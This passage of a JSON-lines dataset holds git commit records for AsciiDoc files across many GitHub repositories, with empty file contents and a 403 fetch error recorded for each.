<8e906ed46ccdc37d68771658f0f8f8740a374927@linaro.org>\n","repos":"OpenFastPath\/ofp,TolikH\/ofp,TolikH\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp,OpenFastPath\/ofp","old_file":"docs\/development-practices.adoc","new_file":"docs\/development-practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TolikH\/ofp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"50931e291188000d0caf0493f39b1e4a395e1243","subject":"docs: improvements to transaction semantics","message":"docs: improvements to transaction semantics\n\nChange-Id: I23a2751923a4214f52e6cdb233f7e3aeee207da2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9235\nReviewed-by: David Ribeiro Alves <dbbafdb4f25eb0c1ff3facf0e5f2f27705055af1@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/transaction_semantics.adoc","new_file":"docs\/transaction_semantics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b9dc3811a0b2563cb7ca7fa7a9bff2aa59390bd","subject":"Update 2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","message":"Update 
2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","new_file":"_posts\/2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a89c6f4009767bbd96e518f5f605c410165d186c","subject":"y2b create post Xbox 360 Messenger Kit Unboxing","message":"y2b create post Xbox 360 Messenger Kit Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-03-Xbox-360-Messenger-Kit-Unboxing.adoc","new_file":"_posts\/2011-10-03-Xbox-360-Messenger-Kit-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3caf2b9429b865efbce757288b555c15ed966f2","subject":"Update 2016-04-13-M-I-T-M.adoc","message":"Update 2016-04-13-M-I-T-M.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-M-I-T-M.adoc","new_file":"_posts\/2016-04-13-M-I-T-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58a6214fb849e3cbbe766a099970e90cc286b791","subject":"y2b create post The Last Game My Dad Ever Played\u2026","message":"y2b create post The Last Game My Dad Ever Played\u2026","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-17-The-Last-Game-My-Dad-Ever-Played.adoc","new_file":"_posts\/2017-02-17-The-Last-Game-My-Dad-Ever-Played.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88b176d5e52e8b3a0c09fe289b6d886f066d0a79","subject":"y2b create post The Worst Gadget EVER On Unbox Therapy...","message":"y2b create post The Worst Gadget EVER On Unbox Therapy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-19-TheWorstGadgetEVEROnUnboxTherapy.adoc","new_file":"_posts\/2018-02-19-TheWorstGadgetEVEROnUnboxTherapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1be69f7689228f294236195c88d94de864b508c","subject":"Update 2015-09-21-Aceess-Control.adoc","message":"Update 
2015-09-21-Aceess-Control.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e3a43e31a162fcad24675f6f6fc89f61238846","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f67d9e21bd76cc06b2feccbeb3f5ffaf5bd25b","subject":"[Docs]\u00a0Fix typo in circuit breaker docs (#29659)","message":"[Docs]\u00a0Fix typo in circuit breaker docs (#29659)\n\nThe previous description had a part that didn't fit and was probably\r\nfrom a copy\/paste of the in flight requests description above.","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/modules\/indices\/circuit_breaker.asciidoc","new_file":"docs\/reference\/modules\/indices\/circuit_breaker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36bc9f82365adacdc411a4f00c78e4f62481bf53","subject":"add required RPM repos for RHEL install","message":"add required RPM repos for RHEL install\n\nadd required RPM repos for RHEL install\n","repos":"redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e242129d4a6ff3884b2206bc03b90e107601f96d","subject":"Added README","message":"Added README\n","repos":"danielsoro\/zoraide-food-system","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danielsoro\/zoraide-food-system.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6940abd934b1b37cb513e6eddffa0dde91a8a26f","subject":"Updated the README","message":"Updated the README\n","repos":"chlewe\/strawpoll,chlewe\/strawpoll","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chlewe\/strawpoll.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff461f26dd21455b26ab8ded2521e8e9364b6901","subject":"Readme added","message":"Readme added\n","repos":"kromkrom\/csv-dict-parser","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kromkrom\/csv-dict-parser.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d15221a178684a08ef1a842df4a65960962f9d5","subject":"y2b create post Watch From The FUTURE - TokyoFlash Kisai Stencil Watch Unboxing","message":"y2b create post Watch From The FUTURE - TokyoFlash Kisai Stencil Watch Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-11-Watch-From-The-FUTURE--TokyoFlash-Kisai-Stencil-Watch-Unboxing.adoc","new_file":"_posts\/2012-04-11-Watch-From-The-FUTURE--TokyoFlash-Kisai-Stencil-Watch-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd79cc1d8682f58c0fe9b81802d80b615a3fa7bd","subject":"Link added.","message":"Link added.\n","repos":"ncoelle\/quartzdemo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncoelle\/quartzdemo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe00e7cb7320fdf793687fe3a4b3a6926d6133b","subject":"Update README","message":"Update README\n","repos":"pjanouch\/desktop-tools,pjanouch\/desktop-tools,pjanouch\/desktop-tools","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/desktop-tools.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"db62d47be585fdd4367ce891914b1628ff027983","subject":"disable code quality badge until enabled","message":"disable code quality badge until enabled\n","repos":"bitnami\/middleman-asciidoc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitnami\/middleman-asciidoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"0e0db2b5455aa4eb694a5edcebf9c5edc16af71e","subject":"add readme.adoc","message":"add readme.adoc\n","repos":"tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/tedbergeron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"825ccbaa9130815ebdead83b20bf0fa66f922b0c","subject":"Add archive text to README.adoc","message":"Add archive text to README.adoc\n","repos":"spring-projects\/rest-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/rest-shell.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3218491e0970e3df33ec3e1ddd5602e189fbe9eb","subject":"Deleted 2016-6-26-PHRER.adoc","message":"Deleted 2016-6-26-PHRER.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHRER.adoc","new_file":"2016-6-26-PHRER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6fa7fccd744df022a3ab23e04808fdfedc693c","subject":"code of conduct","message":"code of conduct\n","repos":"spring-cloud-stream-app-starters\/app-starters-release,spring-cloud-stream-app-starters\/app-starters-release","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/app-starters-release.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4efc4b6e25bd5856a0c511f7bcbb667c268426f5","subject":"Fix link","message":"Fix link\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3ba46fedc401dc54aabecf9c1fe4e9bd127b315","subject":"Readme: Add Waitress and remove mod_wsgi from WSGI server tips","message":"Readme: Add Waitress and remove mod_wsgi from WSGI server tips\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e09d914eac6f8dd570d59f0054f65ad189f54a25","subject":"PLATSERV-184: Comentada la secci\u00f3n de los repositorios Maven","message":"PLATSERV-184: Comentada la secci\u00f3n de los repositorios Maven\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a81154d1ebadcdedfec1735bdb018305607cdca","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"10sr\/machine-setups,10sr\/server-provisions,10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"88a2e5d8d488f390f84cf33ad3a0505d767373ec","subject":"\u66f4\u65b0 README.adoc \u6587\u6863","message":"\u66f4\u65b0 README.adoc \u6587\u6863\n","repos":"yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liygheart\/jfinalbbs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04155bd62e561468f86d95302d38668d4f2bcc6b","subject":"[README] Fixing Maven URL.","message":"[README] Fixing Maven URL.","repos":"gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,DevFactory\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,DevFactory\/afc,gallandarakhneorg\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b300a40414e56440333361d0a185752ab738a2b","subject":"Update 2016-01-12-new.adoc","message":"Update 2016-01-12-new.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-new.adoc","new_file":"_posts\/2016-01-12-new.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7cab56a33ee3d9516ec214e105037cfb8571362","subject":"Update 2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","message":"Update 2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","new_file":"_posts\/2015-11-18-Generar-y-utilizar-llaves-SSH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c91a1fa8c9f46018878e450b14c2942a13674d03","subject":"Accept CIP2016-01-26-mandatory-match","message":"Accept 
CIP2016-01-26-mandatory-match\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d579a7febe7175e7b390452e51a39eb503facafc","subject":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2798da50184ac5c35f69cb44b6362e9cdcc6621","subject":"Plan SITN","message":"Plan SITN\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Divers\/SITN.adoc","new_file":"Divers\/SITN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b0660c23241b9765510454a4e90b2203d8f7c30","subject":"Update 2015-08-11-Un-peu-de-pratique.adoc","message":"Update 2015-08-11-Un-peu-de-pratique.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f14c95bbd2ec87401ec2ef0696d413df10e574","subject":"Create subversion.adoc","message":"Create subversion.adoc","repos":"swehacker\/cheatsheets,swehacker\/cheatsheets","old_file":"drafts\/subversion.adoc","new_file":"drafts\/subversion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/swehacker\/cheatsheets.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff829545d17c36bdc6b0bca384212977eeaa8ae8","subject":"y2b create post GDC Money Clip + Secret Blade","message":"y2b create post GDC Money Clip + Secret Blade","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-24-GDC-Money-Clip--Secret-Blade.adoc","new_file":"_posts\/2014-03-24-GDC-Money-Clip--Secret-Blade.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"944d99984f3e1c5c17df6634160b67d545ee27d1","subject":"Create do-accessible-es.adoc","message":"Create do-accessible-es.adoc\n\nSpanish translation for 
do-accessible.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-accessible-es.adoc","new_file":"src\/do\/do-accessible-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b542ffafa9038d02b32d3be804f388d5f4b92634","subject":"Update 2017-01-21-Duvarlik-Dert.adoc","message":"Update 2017-01-21-Duvarlik-Dert.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-01-21-Duvarlik-Dert.adoc","new_file":"_posts\/2017-01-21-Duvarlik-Dert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c361ebfa18b42f0caafe8e829c6f5f9c3388b27","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f7b4bad1abd05884d669f3410f959b02546f1a5","subject":"Fix typo (thanks to Takugo-san)","message":"Fix typo (thanks to Takugo-san)\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website","old_file":"localized\/de\/index.adoc","new_file":"localized\/de\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fa6a657820eb219a0e0b264a914906eaf7a3e3a","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393734009b6e2f0078d55a9820292e6a0ac87813","subject":"Update 2016-03-29-Ingenieria-social-S-E.adoc","message":"Update 2016-03-29-Ingenieria-social-S-E.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70dea4b52f5b526ec601c7ad634aebc649f825e1","subject":"Update 
2016-07-15-Sistemas-inteligentes.adoc","message":"Update 2016-07-15-Sistemas-inteligentes.adoc","repos":"christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io","old_file":"_posts\/2016-07-15-Sistemas-inteligentes.adoc","new_file":"_posts\/2016-07-15-Sistemas-inteligentes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christianmtr\/christianmtr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4ecc2e37b2942504cb576839e03f32a2832b87","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32300742fcd9413677fe6404ebdb59240830b6ac","subject":"Update 2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","message":"Update 2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","new_file":"_posts\/2016-08-16-Simple-j-Query-character-countdown-in-textarea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"062be23fa5da2ccfee286d836aa3d64f327e4a06","subject":"Updates 6.0.0-beta1 release notes","message":"Updates 6.0.0-beta1 release notes\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elasticassandra,strapdata\/elassandra","old_file":"docs\/reference\/release-notes\/6.0.0-beta1.asciidoc","new_file":"docs\/reference\/release-notes\/6.0.0-beta1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d4388fcd3dfb7e6aec8a5b108f1cd2fa4f837f4","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 